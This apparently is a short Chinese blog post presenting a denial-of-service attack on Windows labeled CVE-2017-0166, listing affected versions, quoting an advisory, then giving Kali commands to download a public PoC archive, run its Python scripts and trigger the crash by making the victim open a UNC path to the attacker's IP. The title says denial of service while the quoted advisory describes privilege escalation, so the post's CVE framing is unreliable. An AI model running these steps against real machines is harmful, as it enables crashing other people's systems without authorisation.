Dos Attack Windows CVE-2017-0166

视频教程:ClickHere

poc地址:https://github.com/lgandx/PoC

受影响系统:
Microsoft Windows VistaMicrosoft Windows Server 2016Microsoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008Microsoft Windows RT 8.1Microsoft Windows 8.1Microsoft Windows 7Microsoft Windows 10
描述:
BUGTRAQ ID: 97446CVE(CAN) ID: CVE-2017-0166Microsoft Windows是流行的计算机操作系统。Microsoft Windows未正确计算LDAP请求缓冲区长度,在实现上存在权限提升漏洞,可使攻击者在提升的上下文中运行进程。<来源:Microsoft 链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0166>

下载到kali,并运行:

cd /tmp
wget -c --no-check-certificate https://github.com/lgandx/PoC/archive/master.zip

unzip PoC-master.zip

cd PoC-master/

cd SMBv3。。。。。剩下table自动补齐

python odict.py

python win10.py

如果没有触发,就Windows的运行窗口下。

\\攻击者ip\

触发一下。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,771评论 19 139
  • 提权辅助工具Windows-Exploit-Suggester
    1提权辅助工具Windows-Exploit-Suggester 1.1Windows-Exploit-Sugge...
    simeon2015阅读 11,804评论 0 5
  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,345评论 0 5
  • 天才在左,疯子在右
    这世界到底是怎样的?从来,我都用二维的角度去看这个世界。我知道这个世界有好有坏,有人有花有动物,每天有善意和恶意的...
    你是我的树阅读 3,114评论 0 4
  • 天涯荡子
    读胡兰成的《今生今世》-----看天涯荡子的回溯 刚开始阅读《今生今世》是冲着胡是张爱玲第一任丈夫,世人对...
    不迟阅读 3,369评论 1 0